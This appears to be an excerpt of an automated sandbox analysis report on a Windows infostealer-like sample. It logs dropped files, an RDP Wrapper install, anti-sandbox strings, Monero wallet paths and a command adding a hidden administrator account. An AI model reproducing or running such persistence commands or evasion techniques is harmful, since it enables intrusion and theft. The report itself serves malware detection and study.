Code function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_00418950

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F142 push ecx; ret	3_2_0042F155
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00422D3B push esi; ret	3_2_00422D3D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DDB5 push ecx; ret	3_2_0041DDC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00432715 push 0000004Ch; iretd	3_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C54B536 push ecx; ret	3_2_6C54B549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0044F116 push esi; retf	11_2_0044F117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_00438B7E push cs; iretd	11_2_00438B85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20443C51 push es; retf	14_2_20443C57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204BF456 push ebx; ret	14_2_204BF457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204AD568 push esp; retf	14_2_204AD570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204ADB66 push esp; retf	14_2_204ADB67
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203129DE push edi; retn 0000h	14_2_203129E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20474BF0 push ecx; ret	14_2_20474C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2047A45D push esi; ret	14_2_2047A45F

Source: file.exe	Static PE information: section name: .text entropy: 7.996079292022533
Source: BGDGHJEHJJ.exe.3.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995375019999394
Source: GIJEGDAKEH.exe.3.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: 66f5db9e54794_vfkagks[1].exe.3.dr	Static PE information: section name: .text entropy: 7.9958244524809645
Source: BKJKEBGDHD.exe.3.dr	Static PE information: section name: .text entropy: 7.776360681632585
Source: 66f5de72d9ebd_rdp[1].exe.3.dr	Static PE information: section name: .text entropy: 7.776360681632585

Persistence and Installation Behavior

Adds a new user with administrator rights

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_7fdfafe0 /add

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5db9e54794_vfkagks[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIJEGDAKEH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	File created: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKJKEBGDHD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5de72d9ebd_rdp[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BGDGHJEHJJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66f5dbaca34ac_lfdnsafnds[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\ProgramData\BKJKEBGDHD.exe	File created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GIJEGDAKEH.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BKJKEBGDHD.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\BGDGHJEHJJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Windows\System32\rfxvmt.dll

Jump to dropped file

Source: C:\Windows\System32\drivers\tsusbhub.sys

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00418950

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\BKJKEBGDHD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ab5570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.3ab5570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2144529083.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 3492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7032, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 27F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory allocated: CA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory allocated: 28F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Memory allocated: 48F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory allocated: F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory allocated: 2880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Memory allocated: 4880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\ProgramData\BKJKEBGDHD.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch
Source: C:\ProgramData\BKJKEBGDHD.exe	Memory allocated: 14E0000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKJKEBGDHD.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKJKEBGDHD.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\BKJKEBGDHD.exe	Window / User API: threadDelayed 4270
Source: C:\ProgramData\BKJKEBGDHD.exe	Window / User API: threadDelayed 1168

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Program Files\RDP Wrapper\rdpwrap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Dropped PE file which has not been started: C:\Windows\System32\rfxvmt.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API coverage: 7.1 %

Source: C:\Users\user\Desktop\file.exe TID: 5376	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe TID: 6088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6208	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe TID: 3160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe TID: 6252	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\BKJKEBGDHD.exe TID: 644	Thread sleep count: 4270 > 30
Source: C:\ProgramData\BKJKEBGDHD.exe TID: 416	Thread sleep count: 1168 > 30
Source: C:\ProgramData\BKJKEBGDHD.exe TID: 7136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\ProgramData\BKJKEBGDHD.exe TID: 6252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5684	Thread sleep count: 44 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\BKJKEBGDHD.exe	Last function: Thread delayed
Source: C:\ProgramData\BKJKEBGDHD.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKJKEBGDHD.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\BKJKEBGDHD.exe	Thread delayed: delay time: 922337203685477

